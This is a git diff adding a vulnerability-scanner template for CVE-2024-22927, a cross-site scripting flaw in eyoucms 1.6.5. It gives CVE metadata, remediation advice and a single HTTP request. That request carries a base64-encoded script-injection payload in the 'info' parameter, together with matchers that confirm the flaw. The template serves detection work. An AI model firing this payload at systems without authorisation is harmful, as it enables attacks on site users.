diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml new file mode 100644 index 0000000000..c6630c9477 --- /dev/null +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-22927 + +info: + name: eyoucms v.1.6.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. + impact: | + Allows attackers to execute malicious scripts on the victim's browser. + remediation: | + Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability. + reference: + - https://github.com/weng-xianhu/eyoucms/issues/57 + - https://nvd.nist.gov/vuln/detail/CVE-2024-22927 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-22927 + cwe-id: CWE-79 + epss-score: 0.00064 + epss-percentile: 0.26844 + cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* + metadata: + vendor: eyoucms + product: eyoucms + fofa-query: title="eyoucms" + tags: cve2024,cve,eyoucms,cms,xss + +http: + - method: POST + path: + - "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'name="num" value="1">' + - 'id="eytime"' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200